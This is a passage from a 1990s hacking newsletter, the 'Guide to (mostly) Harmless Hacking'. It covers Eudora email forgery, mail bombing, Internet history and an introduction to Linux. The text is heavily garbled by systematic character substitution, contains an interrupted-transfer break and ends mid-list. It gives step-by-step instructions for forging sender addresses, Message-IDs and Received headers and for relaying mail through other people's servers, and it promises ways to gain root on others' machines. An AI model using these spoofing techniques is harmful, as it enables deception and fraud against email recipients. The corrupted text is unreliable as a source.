"o way& #his is serious stuff& Hor e'am.le( check out the full headers of this email: 5eturn?+ath: ^cmeinelJtechbroker&comV 5ecei<ed: from ki>mia>&fu&org !rootJki>mia>&fu&org Y-ME&,G&KD&,EMZ$ by HooEE&com !D&D&EID&D&E$ with 3S6#+ id C**M99,5 for ^c.mJfooEE&comVA Sat( ,% Se. ,99K -,:5G:%G ?MEMM !62#$ 5ecei<ed: from *nteros !.mdMD&fooEE&com Y,9D&59&,KE&G,Z$ by ki>mia>&fu&org !D&D&5ID&D&5$ with S6#+ id 0**-9KMG for ^c.mJfooEE&comVA Sat( ,% Se. ,99K -M:5G:-M ?MKMM !+2#$ 2ate: Sat( ,% Se. ,99K -M:5G:-M ?MKMM !+2#$ 6essage?1d: ^-&-&,E&,99KM9,%-,GK%K&5%MfM5M-Jayatollah&irV recei<ed: from emoutM9&mail&ayatollah&ir !emoutM9&m'&aol&com Y,9D&D,&,,&-GZ$by HooEE&com !D&D&EID&D&E$ with 3S6#+ id 6**-99EK for ^c.mJfooEE&comVA 6on( D Se. ,99K ,-:ME:M9 ?MEMM !62#$ Ha<orite?color:tur@uoise U?Sender: meinelJayatollah&ir !0n<erified$ U?6ailer: Windows 3udora +ro Cersion -&- !,E$ 6ime?Cersion: ,&M /ontent?#y.e: te'tI.lainA charsetW:us?ascii: #o: c.mJfooEE&com Hrom: /arolyn 6einel ^cmeinelJtechbroker&comV Sub=ect: #est of forged e<erything 1 actually sent this email though a +++ connection with my account c.mJfooEE&com to myself at that same address& ;es( this email began and ended u. at the same com.uter& Howe<er( if you read the headers( this email looks like it was sent by a com.uter named *nteros( then went to ki>mia>&fu&org( then ayatollah&ir& Sender( it re.orts( is un<erified but a..ears to be meinelJayatollah&ir& What is of .articular interest is the message 12& 6any .eo.le( e<en e'.erienced sysadmins and hackers( assume that e<en with forged email( the com.uter name at the end of the message 12 is the com.uter on which the email was written( and the com.uter that holds the record of who the guy was who forged it& But you can @uickly .ro<e with 3udora +ro that you can forge a message 12 that references almost any com.uter( including none'istent com.uters&

Some of this Guide is clearly amateurish& Hor hundreds of dollars you can buy an email .rogram from a s.ammer com.any that will forge email better and .um. it out faster& Still( this learning to forge email on 3udora illustrates many basic .rinci.les of email forgery& 7etbs start with the senderbs email address& 1 managed to myself three different fake addresses in this email: meinelJayatollah&ir cmeinelJtechbroker&com c.mJfooEE&com 4nly the last of these( c.mJfooEE&com( was `real&a #he other two 1 inserted myself& #here is a legitimate use for this .ower& 1n my case( 1 ha<e se<eral 1S+s but like to ha<e e<erything returned to my email address at my own domain( techbroker&com& But that ayatollah address is .urely a =oke& Herebs how 1 .ut in those names& ,$ 1n 3udora( click `toolsa then `o.tions&a #his will .ull down a menu& -$ /lick `+ersonal 1nformation&a Hor forging email( you can make e<ery one of these entries fake& %$ #he address you .ut under `+o. accounta is where you tell 3udora where to look to .ick u. your email& But guess what? When you send email you can .ut a .hony host in there& 1 .ut `ayatollah&ir&a #his generated the line in the header( `6essage?1d: ^-&-&,E&,99KM9,%-,GK%K&5%MfM5M-Jayatollah&irV&a Some .eo.le think the message 12 is the best way to track down forged email& Rust mail the sysadmin at ayatollah&ir( right? Wrong G$ `5eal namea and `5eturn addressa are what showed u. in the header lines `Hrom: /arolyn 6einel ^cmeinelJtechbroker&comVa and `5eturn?+ath: ^cmeinelJtechbroker&comV&a 1 could ha<e made them fake& 1f they are fake( .eo.le canbt re.ly to you by gi<ing the `re.lya command in their email .rogram& 5$ "e't( while still on the o.tions .ulldown( scroll down to `sending mail&a Guess what( under `S6#+ Ser<er(a you donbt ha<e to .ut in the one your 1S+ offers you to send your email out on& With a little e'.erimentation you can find hundreds ?? thousands ?? millions ?? of other com.uters that you can use

to send email on& Howe<er( this must be a real com.uter that will really send out your email& 1 .icked ki>mia>&fu&org for this one& #hat accounts for the header lines: 5ecei<ed: from ki>mia>&fu&org !rootJki>mia>&fu&org Y-ME&,G&KD&,EMZ$ by HooEE&com !D&D&EID&D&E$ with 3S6#+ id C**M99,5 for ^c.mJfooEE&comVA Sat( ,% Se. ,99K -,:5G:%G ?MEMM !62#$ 5ecei<ed: from *nteros !.mdMD&fooEE&com Y,9D&59&,KE&G,Z$ by ki>mia>&fu&org !D&D&5ID&D&5$ with S6#+ id 0**-9KMG for ^c.mJfooEE&comVA Sat( ,% Se. ,99K -M:5G:-M ?MKMM !+2#$ How to 6ake 3'tra Headers and Hake the +ath through the 1nternet But maybe this doesnbt make a weird enough header for you& Want to make your email e<en .honier? 3<en really e'.erienced 3udora users rarely know about how to make e'tra headers( so itbs a great way to show off& ,$ 4.en Windows 3'.lorer by clicking `start(a then `.rograms(a then `Windows 3'.lorer&a -$ 4n the left hand side is a list of directories& /lick on 3udora& %$ 4n the right hand side will be all the directories and files in 3udora& Scroll down them to the files& /lick on `eudora&ini&a G$ 3udora&ini is now in "ote.ad and ready to edit& 5$ Hi' it u. by adding a line at the going to the line entitled `e'tra headersW` under Y2ialu.Z& *fter the `W` ty.e in something like this: e'traheadersWrecei<ed:from emoutM9&mail&ayatollah&ir !emoutM9&m'&aol&com Y,9D&D,&,,&-GZ$by HooEE&com !D&D&EID&D&E$ with 3S6#+ id 6**-99EK for ^c.mJfooEE&comVA 6on( D Se. ,99K ,-:ME:M9 ?MEMM !62#$ With this set u.( all your email going out from 3udora will include that line in the headers& ;ou can add as many e'tra headers to your email as you want by adding new lines that also start with `e'tra headersWa& Hor e'am.le( in this case 1 also added `Ha<orite?color:tur@uoise&a )))))))))))))))))))))))))))))))))))))))))))))))))))))) ;ou can go to =ail warning: #here still are ways for e'.erts to tell where you sent this email from& So if someone were to use forged email to defraud( threaten or mail bomb .eo.le( watch out for that cellmate named S.ike&

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1s it +ossible to 6ail Bomb 0sing 3udora? #he ob<ious way to mail bomb with 3udora doesnbt work& #he ob<ious way is to .ut the address of your <ictim into the address list a few thousand times and then attach a really big file& But the result will be only one message going to that address& #his is no thanks to 3udora itself& #he mail daemons in common use on the 1nternet such as sendmail( smail and @mail only allow one message to be sent to each address .er email& 4f course there are better ways to forge email with 3udora& *lso( there is a totally tri<ial way to use 3udora to send hundreds of gigantic attached files to one reci.ient( crashing the mail ser<er of the <ictimbs 1S+& But 1bm not telling you how because this is( after all( a Guide to !mostly$ Harmless Hacking& But ne't time those Global k4S dudes try to snooker you into using one of their mail bomber .rograms !they claim these .rograms will kee. you safely anonymous but in fact you will get caught$ =ust remember all they are doing is .ackaging u. stuff that anyone who knows two sim.le tricks could do much better with 3udora& !1f you are a legitimate com.uter security .rofessional( and you want to =oin us at 1nfowar in sol<ing the .roblem( contact me for details and webll think about whether to trust you&$ )))))))))))))))))))))))))))))))))))))))))))))))) 3<il Genius #i.: #his deadly mailbomber thingy is a feature( yes( honest?to? gosh intended H3*#053( of sendmail& Get out your manuals and study& )))))))))))))))))))))))))))))))))))))))))))))))) #he ease with which one may forge .erfect mail and commit mail bombings which crash entire 1S+ mail ser<ers and e<en shut down 1nternet backbone .ro<iders such as has recently ha..ened to *G1S may well be the greatest threat the 1nternet faces today& 1bm not ha..y about re<ealing this much& 0nfortunately( the mail forgery .roblem is a dee.ly ingrained flaw in the 1nternetbs basic structure& So it is almost im.ossible to e'.lain the basics of hacking without re<ealing the .ieces to the .u>>le of the .erfect forgery and .erfect mailbombing& 1f you figure it out( be a good guy and donbt abuse it( 48? Become one of us insiders who see the .roblem ?? and want to fi' it rather than e'.loit it for greed or hatred&

/ontents of Colume -: 1nternet for 2ummies 7inu' 1ntroduction to #/+I1+ +ort Surfing FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF G0123 #4 !mostly$ H*5673SS H*/81"G Col& - "umber , 1nternet for 2ummies ?? ski. this if you are a 0ni' wi>ard& But if you read on youbll get some more kewl hacking instructions& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF #he si' Guides to !mostly$ Harmless Hacking of Col& , =um.ed immediately into how?to hacking tricks& But if you are like me( all those details of .robing .orts and .laying with hy.otheses and .inging down hosts gets a little di>>ying& So how about catching our breath( standing back and re<iewing what the heck it is that we are .laying with? 4nce we get the basics under control( we then can mo<e on to serious hacking& *lso( 1 ha<e been wrestling with my conscience o<er whether to start gi<ing you ste.?by?ste. instructions on how to gain root access to other .eo.lesb com.uters& #he little angel on my right shoulder whis.ers( `Gaining root without .ermission on other .eo.lebs com.uters is not nice& So donbt tell .eo.le how to do it&a #he little de<il on my left shoulder says( `/arolyn( all these hackers think you donbt know nothinb +544C3 to them you know how to crack a #he little angel says( `1f anyone reading Guide to !mostly$ Harmless Hacking tries out this trick( you might get in trouble with the law for cons.iracy to damage other .eo.lesb com.uters&a #he little de<il says( `But( /arolyn( tell .eo.le how to crack into root and they will think you are 83W7 a So herebs the deal& 1n this and the ne't few issues of Guide to !mostly$ Harmless Hacking 1bll tell you se<eral ways to get logged on as the su.eruser

in the root account of some 1nternet host com.uters& But the instructions will lea<e a thing or two to the imagination& 6y theory is that if you are willing to wade through all this( you .robably arenbt one of those chea. thrills hacker wannabes who would use this knowledge to do something destructi<e that would land you in =ail& ))))))))))))))))))))))))))))) #echnical ti.: 1f you wish to become a )serious) hacker( youbll need 7inu' !a freeware <ariety of 0ni'$ on your +/& 4ne rV ???????????????????????????????????????????????????????????????????????? #ransfer interru.ted o root legally all you want ?? on your own com.uter& 1t sure beats struggling around on someone elsebs com.uter only to disco<er that what you thought was root was a cle<erly set tra. and the sysadmin and HB1 laugh at you all the way to =ail& 7inu' can be installed on a +/ with as little as a %DE /+0( only - 6b 5*6 and as little as -M 6B of hard disk& ;ou will need to reformat your hard disk& While some .eo.le ha<e successfully installed 7inu' without trashing their 24SIWindows stuff( donbt count on getting away with it& Backu.( backu.( backu. ))))))))))))))))))))))))))))) ))))))))))))))))))))))))))))) ;ou can go to =ail warning: /rack into root on someone elsebs com.uter and the slammer becomes a definite .ossibility& #hink about this: when you see a news story about some hacker getting busted( how often do you recogni>e the name? How often is the latest bust being done to someone famous( like 2ark #angent or seKen or 3mmanuel Goldstein? How about( like( ne<er #hatbs because really good hackers figure out how to not do stu.id stuff& #hey learn how to crack into com.uters for the intellectual challenge and to figure out how to make com.uters safe from intruders& #hey donbt bull their way into root and make a mess of things( which tends to ins.ire sysadmins to call the co.s& ))))))))))))))))))))))))))))))))) 3'citing notice: 1s it too boring to =ust hack into your own 7inu' machine? Hang in there& 1ra Winkler of the "ational /om.uter Security *ssociation(

2ean Garlick of the S.ace 2ynamics 7ab of 0tah State 0ni<ersity and 1 are working on setting u. hack&net( a .lace where it will be legal to break into com.uters& "ot only that( webre looking for s.onsors who will gi<e cash awards and scholarshi.s to those who show the greatest hacking skills& "ow does that sound like more .hun than =ail? ))))))))))))))))))))))))))))) So( letbs =um. into our hacking basics tutorial with a look at the wondrous anarchy that is the 1nternet& "ote that these Guides to !mostly$ Harmless Hacking focus on the 1nternet& #hat is because there are many legal ways to hack on the 1nternet& *lso( there are o<er ,M million of these readily hackable com.uters on the 1nternet( and the number grows e<ery day& 1nternet Basics "o one owns the 1nternet& "o one runs it& 1t was ne<er .lanned to be what it is today& 1t =ust ha..ened( the mutant outgrowth of a ,9E9 0S 2efense *d<anced 5esearch +ro=ects *gency e'.eriment& #his anarchic system remains tied together because its users <oluntarily obey some basic rules& #hese rules can be summed u. in two words: 0ni' and #/+I1+ !with a nod to 00/+$& 1f you understand( truly understand 0ni' and #/+I1+ !and 00/+$( you will become a fish swimming in the sea of cybers.ace( an 0berhacker among hacker wannabes( a master of the 1nternet uni<erse& #o get technical( the 1nternet is a world?wide distributed com.uterIcommunications network held together by a common communications standard( #ransmission /ontrol +rotocolI1nternet +rotocol !#/+I1+$ and a bit of 00/+& #hese standards allow anyone to hook u. a com.uter to the 1nternet( which then becomes another node in this network of the 1nternet& *ll that is needed is to get an 1nternet address assigned to the new com.uter( which is then known as an 1nternet :host(: and tie into an 1nternet communications link& #hese links are now a<ailable in almost all .arts of the world& 1f you use an on?line ser<ice from your .ersonal com.uter( you( too( can tem.orarily become .art of the 1nternet& #here are two main ways to hook u. to an on?line ser<ice&

#here is the cybercouch .otato connection that e<ery newbie uses& 1t re@uires either a .oint?to?.oint !+++$ or S71+connection( which allows you to run .retty .ictures with your Web browser& 1f you got some sort of .ackaged software from your 1S+( it automatically gi<es you this sort of connection& 4r you can connect with a terminal emulator to an 1nternet host& #his .rogram may be something as sim.le as the Windows %&, `#erminala .rogram under the `*ccessoriesa icon& 4nce you ha<e dialed in and connected you are =ust another terminal on this host machine& 1t wonbt gi<e you .retty .ictures& #his connection will be similar to what you get on an old?fashioned BBS& But if you know how to use this kind of connection( it could e<en gi<e you root access to that host& But how is the host com.uter you use attached to the 1nternet? 1t will be running some <ariety of the 0ni' o.erating system& Since 0ni' is so easy to ada.t to almost any com.uter( this means that almost any com.uter may become an 1nternet host& Hor e'am.le( 1 sometimes enter the 1nternet through a host which is a Silicon Gra.hics 1ndigo com.uter at 0tah State 0ni<ersity& 1ts 1nternet address is fantasia&idec&sdl&usu&edu& #his is a com.uter o.timi>ed for com.uter animation work( but it can also o.erate as an 1nternet host& 4n other occasions the entry .oint used may be .egasus&unm&edu( which is an 1B6 5S EMMM 6odel %KM& #his is a com.uter o.timi>ed for research at the 0ni<ersity of "ew 6e'ico& *ny com.uter which can run the necessary software ?? which is basically the 0ni' o.erating system ?? has a modem( and is tied to an 1nternet communications link( may become an 1nternet node& 3<en a +/ may become an 1nternet host by running one of the 7inu' fla<ors of 0ni'& *fter setting it u. with 7inu' you can arrange with the 1S+ of your choice to link it .ermanently to the 1nternet& 1n fact( many 1S+s use nothing more than networked +/s running 7inu' *s a result( all the com.uting( data storage( and sending( recei<ing and forwarding of messages on the 1nternet is handled by the millions of com.uters of many ty.es and owned by countless com.anies( educational institutions( go<ernmental entities and e<en indi<iduals&

3ach of these com.uters has an indi<idual address which enables it to be reached through the 1nternet if hooked u. to a a..ro.riate communications link& #his address may be re.resented in two ways: as a name or a number& #he communications links of the 1nternet are also owned and maintained in the same anarchic fashion as the hosts& 3ach owner of an 1nternet host is res.onsible for finding and .aying for a communications link that will get that host tied in with at least one other host& /ommunications links may be as sim.le as a .hone line( a wireless data link such as cellular digital .acket data( or as com.licated as a high s.eed fiber o.tic link& *s long as the communications link can use #/+I1+ or 00/+( it can fit into the 1nternet& #hus the net grows with no o<erall coordination& * new owner of an 1nternet host need only get .ermission to tie into one communications link to one other host& *lternati<ely( if the .ro<ider of the communications link decides this host is( for e'am.le( a ha<en for s.ammers( it can cut this `rogue sitea off of the 1nternet& #he rogue site then must snooker some other communications link into tying it into the 1nternet again& #he way most of these interconnected com.uters and communications links work is through the common language of the #/+I1+ .rotocol& Basically( #/+I1+ breaks any 1nternet communication into discrete :.ackets&: 3ach .acket includes information on how to rout it( error correction( and the addresses of the sender and reci.ient& #he idea is that if a .acket is lost( the sender will know it and resend the .acket& 3ach .acket is then launched into the 1nternet& #his network may automatically choose a route from node to node for each .acket using whate<er is a<ailable at the time( and reassembles the .ackets into the com.lete message at the com.uter to which it was addressed& #hese .ackets may follow tortuous routes& Hor e'am.le( one .acket may go from a node in Boston to *msterdam and back to the 0S for final destination in Houston( while another .acket from the same message might be routed through #okyo and *thens( and so on& 0sually( howe<er( the communications links are not nearly so torturous& /ommunications links may include fiber o.tics( .hone lines and satellites& #he strength of this .acket?switched network is that most messages will automatically get through des.ite hea<y message traffic congestion and many communications links being out of ser<ice& #he disad<antage is that messages may sim.ly disa..ear within the system& 1t also may be difficult to reach

desired com.uters if too many communications links are una<ailable at the time& Howe<er( all these wonderful features are also .rofoundly hackable& #he 1nternet is robust enough to sur<i<e ?? so its in<entors claim ?? e<en nuclear war& ;et it is also so weak that with only a little bit of instruction( it is .ossible to learn how to seriously s.oof the system !forged email$ or e<en tem.orarily .ut out of commission other .eo.le's 1nternet host com.uters !flood .inging( for e'am.le&$ 4n the other hand( the headers on the .ackets that carry hacking commands will gi<e away the account information from which a hacker is o.erating& Hor this reason it is hard to hide .erfectly when on the 1nternet& 1t is this tension between this .ower and robustness and weakness and .otential for confusion that makes the 1nternet a hacker .layground& Hor e'am.le( H353 1S ;405 H*/835 #1+ ;40bC3 B33" W*1#1"G H45 #H1S 1SS03: ft.:IIft.&secnet&com #his ft. site was .osted on the B0G#5*S list( which is dedicated to discussion of 0ni' security holes& 6oderator is *le.h 4ne( who is a genuine 0berhacker& 1f you want to subscribe to the B0G#5*S( email 71S#S35CJnets.ace&org with message `subscribe B0G#5*S&a "ow( back to 1nternet basics& History of 1nternet *s mentioned abo<e( the 1nternet was born as a 0S *d<anced 5esearch +ro=ects *gency !*5+*$ effort in ,9E9& 1ts in<entors called it *5+*"3#& But because of its <alue in scientific research( the 0S "ational Science Houndation !"SH$ took it o<er in ,9D%& But o<er the years since then it gradually e<ol<ed away from any single source of control& 1n *.ril ,995 "SH cut the last a.ron strings& "ow the 1nternet is run by no one& 1t =ust ha..ens and grows out of the efforts of those who .lay with it and struggle with the software and hardware&

"othing at all like this has e<er ha..ened before& We now ha<e a com.uter system with a life of its own& We( as hackers( form a big .art of the mutation engine that kee.s the 1nternet e<ol<ing and growing stronger& We also form a big .art of the immune system of this e'otic creature& #he original idea of *5+*"3# was to design a com.uter and communications network that would e<entually become so redundant( so robust( and so able to o.erate without centrali>ed control( that it could e<en sur<i<e nuclear war& What also ha..ened was that *5+*"3# e<ol<ed into a being that has sur<i<ed the end of go<ernment funding without e<en a bli. in its growth& #hus its anarchic offs.ring( the 1nternet( has succeeded beyond the wildest dreams of its original architects& #he 1nternet has grown e'.losi<ely( with no end in sight& *t its ince.tion as *5+*"3# it held only G hosts& * @uarter of a century later( in ,9DG( it contained only ,MMM hosts& But o<er the ne't 5 years this number grew tenfold to ,M(MMM !,9D9$& 4<er the following G years it grew another tenfold to , million !,99%$& #wo years later( at the end of ,995( the 1nternet was estimated to ha<e at least E million host com.uters& #here are .robably o<er ,M million now& #here a..ears to be no end in sight yet to the incredible growth of this mutant child of *5+*"3#& 1n fact( one concern raised by the e'.onential growth in the 1nternet is that demand may e<entually far outrace ca.acity& Because now no entity owns or controls the 1nternet( if the ca.acity of the communications links among nodes is too small( and it were to become seriously bogged down( it might be difficult to fi' the .roblem& Hor e'am.le( in ,9DD( 5obert 6orris( Rr& unleashed a :<irus:?ty.e .rogram on the 1nternet commonly known as the `6orris Worm&a #his <irus would make co.ies of itself on whate<er com.uter it was on and then send co.ies o<er communications links to other 1nternet hosts& !1t used a bug in sendmail that allowed access to root( allowing the <irus to act as the su.eruser$& Suickly the e'.onential s.read of this <irus made the 1nternet colla.se from the communications traffic and disk s.ace it tied u.& *t the time the 1nternet was still under some semblance of control by the "ational Science Houndation and was connected to only a few thousand com.uters& #he "et was shut down and all <iruses .urged from its host

com.uters( and then the "et was .ut back into o.eration& 6orris( meanwhile( was .ut in =ail& #here is some concern that( des.ite im.ro<ed security measures !for e'am.le( :firewalls:$( someone may find a new way to launch a <irus that could again shut down the 1nternet& Gi<en the loss of centrali>ed control( restarting it could be much more time?consuming if this were to ha..en again& But reestablishing a centrali>ed control today like what e'isted at the time of the `6orris Worma is likely to be im.ossible& 3<en if it were .ossible( the original *5+*"3# architects were .robably correct in their assessment that the "et would become more susce.tible for massi<e failure rather than less if some centrali>ed control were in .lace& +erha.s the single most significant feature of today's 1nternet is this lack of centrali>ed control& "o .erson or organi>ation is now able to control the 1nternet& 1n fact( the difficulty of control became an issue as early as its first year of o.eration as *5+*"3#& 1n that year email was s.ontaneously in<ented by its users& #o the sur.rise of *5+*"3#'s managers( by the second year email accounted for the bulk of the communication o<er the system& Because the 1nternet had grown to ha<e a fully autonomous( decentrali>ed life of its own( in *.ril ,995( the "SH @uit funding "SH"3#( the fiber o.tics communications backbone which at one time had gi<en "SH the technology to control the system& #he .roliferation of .arallel communications links and hosts had by then com.letely by.assed any .ossibility of centrali>ed control& #here are se<eral ma=or features of the 1nternet: ) World Wide Web ?? a hy.erte't .ublishing network and now the fastest growing .art of the 1nternet& ) email ?? a way to send electronic messages ) 0senet ?? forums in which .eo.le can .ost and <iew .ublic messages ) telnet ?? a way to login to remote 1nternet com.uters ) file transfer .rotocol ?? a way to download files from remote 1nternet com.uters ) 1nternet relay chat ?? real?time te't con<ersations ?? used .rimarily by hackers and other 1nternet old?timers ) go.her ?? a way of cataloging and searching for information& #his is ra.idly growing obsolete&

*s you .ort surfers know( there are do>ens of other interesting but less well known ser<ices such as whois( finger( .ing etc& #he World Wide Web #he World Wide Web is the newest ma=or feature of the 1nternet( dating from the s.ring of ,99-& 1t consists of :Web .ages(: which are like .ages in a book( and links from s.ecially marked words( .hrases or symbols on each .age to other Web .ages& #hese .ages and links together create what is known as :hy.erte't&: #his techni@ue makes it .ossible to tie together many different documents which may be written by many .eo.le and stored on many different com.uters around the world into one hy.erte't document& #his techni@ue is based u.on the 0ni<ersal 5esource 7ocator !057$ standard( which s.ecifies how to hook u. with the com.uter and access the files within it where the data of a Web .age may be stored& * 057 is always of the form htt.:II^rest of addressV( where ^rest of addressV includes a domain name which must be registered with an organi>ation called 1nter"1/ in order to make sure that two different Web .ages !or email addresses( or com.uter addresses$ don't end u. being identical& #his registration is one of the few centrali>ed control features of the 1nternet& Here's how the hy.erte't of the World Wide Web works& #he reader would come to a statement such as :our com.any offers 7#7 truck ser<ice to all ma=or 0S cities&: 1f this statement on the :Web .age: is highlighted( that means that a click of the reader's com.uter mouse will take him or her to a new Web .age with details& #hese may include com.lete schedules and a form to fill out to order a .icku. and deli<ery& Some Web .ages e<en offer ways to make electronic .ayments( usually through credit cards& Howe<er( the security of money transfers o<er the 1nternet is still a ma=or issue& ;et des.ite concerns with <erifiability of financial transactions( electronic commerce o<er the Web is growing fast& 1n its second full year of e'istence( ,99G( only some O,K&E million in sales were conducted o<er the Web& But in ,995( sales reached OGMM million& #oday( in ,99E( the Web is =ammed with commercial sites begging for your credit card information&

1n addition( the Web is being used as a tool in the distribution of a new form of currency( known as electronic cash& 1t is concei<able that( if the hurdle of <erifiability may be o<ercome( that electronic cash !often called ecash$ may .lay a ma=or role in the world economy( sim.lifying international trade& 1t may also e<entually make national currencies and e<en ta'ation as we know it obsolete& 3'am.les of Web sites where one may obtain ecash include the 6ark #wain Bank of St& 7ouis( 64 !htt.:IIwww&marktwain&com$ and 2igicash of *msterdam( #he "etherlands !htt.:IIwww&digicash&com$& #he almost out?of?control nature of the 1nternet manifests itself on the World Wide Web& #he author of a Web .age does not need to get .ermission or make any arrangement with the authors of other Web .ages to which he or she wishes to establish links& 7inks may be established automatically sim.ly by .rogramming in the 057s of desired Web .age links& /on<ersely( the only way the author of a Web .age can .re<ent other .eo.le from reading it or establishing hy.erte't links to it is to set u. a .assword .rotection system !or by not ha<ing communications links to the rest of the 1nternet$& * .roblem with the World Wide Web is how to find things on it& Rust as anyone may hook a new com.uter u. to the 1nternet( so also there is no central authority with control or e<en knowledge of what is .ublished where on the World Wide Web& "o one needs to ask .ermission of a central authority to .ut u. a Web .age& 4nce a user knows the address !057$ of a Web .age( or at least the 057 of a Web .age that links e<entually to the desired .age( then it is .ossible !so long as communications links are a<ailable$ to almost instantly hook u. with this .age& Because of the <alue of knowing 057s( there now are many com.anies and academic institutions that offer searchable inde'es !located on the Web$ to the World Wide Web& *utomated .rograms such as Web crawlers search the Web and catalog the 057s they encounter as they tra<el from hy.erte't link to hy.erte't link& But because the Web is constantly growing and changing( there is no way to create a com.rehensi<e catalog of the entire Web&

3mail 3mail is the second oldest use of the 1nternet( dating back to the *5+*net of ,9K-& !#he first use was to allow .eo.le to remotely log in to their choice of one of the four com.uters on which *5+*net was launched in ,9K,&$ #here are two ma=or uses of email: .ri<ate communications( and broadcasted email& When broadcasted( email ser<es to make announcements !one?way broadcasting$( and to carry on discussions among grou.s of .eo.le such as our Ha..y Hacker list& 1n the grou. discussion mode( e<ery message sent by e<ery member of the list is broadcasted to all other members& #he two most .o.ular .rogram ty.es used to broadcast to email discussion grou.s are ma=ordomo and listser<& 0senet 0senet was a natural outgrowth of the broadcasted email grou. discussion list& 4ne .roblem with email lists is that there was no easy way for .eo.le new to these grou.s to =oin them& *nother .roblem is that as the grou. grows( a member may be deluged with do>ens or hundreds of email messages each day& 1n ,9K9 these .roblems were addressed by the launch of 0senet& 0senet consists of news grou.s which carry on discussions in the form of :.osts&: 0nlike an email discussion grou.( these .osts are stored( ty.ically for two weeks or so( awaiting .otential readers& *s new .osts are submitted to a news grou.( they are broadcast to all 1nternet hosts that are subscribed to carry the news grou.s to which these .osts belong& With many 1nternet connection .rograms you can see the similarities between 0senet and email& Both ha<e similar headers( which track their mo<ement across the "et& Some .rograms such as +ine are sent u. to send the same message simultaneously to both email addresses and newsgrou.s& *ll 0senet news readers allow you to email the authors of .osts( and many also allow you to email these .osts themsel<es to yourself or other .eo.le& "ow( here is a @uick o<er<iew of the 1nternet basics we .lan to co<er in the ne't se<eral issues of Guide to !mostly$ Harmless Hacking: ,& 0ni'

We discuss `shellsa which allow one to write .rograms !`scri.tsa$ that automate com.licated series of 0ni' commands& #he reader is introduced to the conce.t of scri.ts which .erform hacking functions& We introduce +erl( which is a shell .rogramming language used for the most elite of hacking scri.ts such as S*#*"& %& #/+I1+ and 00/+ #his cha.ter co<ers the communications links that bind together the 1nternet from a hackers' .ers.ecti<e& 3'tra attention is gi<en to 00/+ since it is so hackable& G& 1nternet *ddresses( 2omain "ames and 5outers #he reader learns how information is sent to the right .laces on the 1nternet( and how hackers can make it go to the wrong .laces How to look u. 00/+ hosts !which are not under the domain name system$ is included& 5& Hundamentals of 3lite Hacking: +orts( +ackets and Hile +ermissions #his section lets the genie of serious hacking out of the bottle& 1t offers a series of e'ercises in which the reader can en=oy gaining access to almost any randomly chosen 1nternet host& 1n fact( by the end of the cha.ter the reader will ha<e had the chance to .ractice se<eral do>en techni@ues for gaining entry to other .eo.les' com.uters& ;et these hacks we teach are ,MMP legal G0123 #4 !mostly$ H*5673SS H*/81"G Col& - "umber 7inu' FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 0ni' has become the .rimo o.erating system of the 1nternet& 1n fact( 0ni' is the most widely used o.erating system in the world among com.uters with more .ower than +/s& #rue( Windows "# is coming u. fast as a common 1nternet o.erating system( and is sooo wonderfully buggy that it looks like it could become the number

one fa<orite to crack into& But today 0ni' in all its wonderful fla<ors still is the o.erating system to know in order to be a truly elite hacker& So far we ha<e assumed that you ha<e been hacking using a shell account that you get through your 1nternet Ser<ice +ro<ider !1S+$& * shell account allows you to gi<e 0ni' commands on one of your 1S+'s com.uters& But you don't need to de.end on your 1S+ for a machine that lets you .lay with 0ni'& ;ou can run 0ni' on your own com.uter and with a S71+ or +++ connection be directly connected to the 1nternet& ))))))))))))))))))))))) "ewbie note: Serial 7ine 1nternet +rotocol !S71+$ and +oint?to?+oint +rotocol !+++$ connections gi<e you a tem.orary 1nternet +rotocol !1+$ address that allows you to be hooked directly to the 1nternet& ;ou ha<e to use either S71+ or +++ connections to get to use a Web browser that gi<es you .ictures instead on te't only& So if you can see .ictures on the Web( you already ha<e one of these a<ailable to you& #he ad<antage of using one of these direct connections for your hacking acti<ities is that you will not lea<e behind a shell log file for your 1S+'s sysadmin to .ore o<er& 3<en if you are not breaking the law( a shell log file that shows you doing lots of hacker stu.h can be enough for some sysadmins to summarily close your account& )))))))))))))))))))) What is the best kind of com.uter to run 0ni' on? 0nless you are a wealthy hacker who thinks nothing of buying a Sun S+*5/ workstation( you'll .robably do best with some sort of +/& #here are almost countless <ariants of 0ni' that run on +/s( and a few for 6acs& 6ost of them are free for download( or ine'.ensi<ely a<ailable on /2?546s& #he three most common <ariations of 0ni' that run on +/s are Sun's Solaris( HreeBS2 and 7inu'& Solaris costs around OKMM& 3nough said& HreeBS2 is really( really good& But you con't find many manuals or newsgrou.s that co<er HreeBS2& 7inu'( howe<er( has the ad<antage of being a<ailable in many <ariants !so you can ha<e fun mi'ing and matching .rograms from different 7inu' offerings$& 6ost im.ortantly( 7inu' is su..orted by many manuals( news grou.s( mail lists and Web sites& 1f you ha<e hacker friends in your area( most of them .robably use 7inu' and can hel. you out&

))))))))))))))))))))) Historical note: 7inu' was created in ,99, by a grou. led by 7inus #or<alds of the 0ni<ersity of Helsinki& 7inu' is co.yrighted under the G"0 General +ublic 7icense& 0nder this agreement( 7inu' may be redistributed to anyone along with the source code& *nyone can sell any <ariant of 7inu' and modify it and re.ackage it& But e<en if someone modifies the source code he or she may not claim co.yright for anything created from 7inu'& *nyone who sells a modified <ersion of 7inu' must .ro<ide source code to the buyers and allow them to reuse it in their commercial .roducts without charging licensing fees& #his arrangement is known as a :co.yleft&: 0nder this arrangement the original creators of 7inu' recei<e no licensing or shareware fees& 7inus #or<alds and the many others who ha<e contributed to 7inu' ha<e done so from the =oy of .rogramming and a sense of community with all of us who will ho.efully use 7inu' in the s.irit of good guy hacking& Ci<a 7inu' Ci<a #or<alds )))))))))))))))))))))) 7inu' consists of the o.erating system itself !called the :kernel:$ .lus a set of associated .rograms& #he kernel( like all ty.es of 0ni'( is a multitasking( multi?user o.erating system& *lthough it uses a different file structure( and hence is not directly com.atible with 24S and Windows( it is so fle'ible that many 24S and Windows .rograms can be run while in 7inu'& So a .ower user will .robably want to boot u. in 7inu' and then be able to run 24S and Windows .rograms from 7inu'& *ssociated .rograms that come with most 7inu' distributions may include: ) a shell .rogram !Bourne *gain Shell ?? B*SH ?? is most common$A ) com.ilers for .rogramming languages such as Hortran?KK !my fa<orite $( /( /XX( +ascal( 71S+( 6odula?-( *da( Basic !the best language for a beginner$( and Smalltalk&A ) U 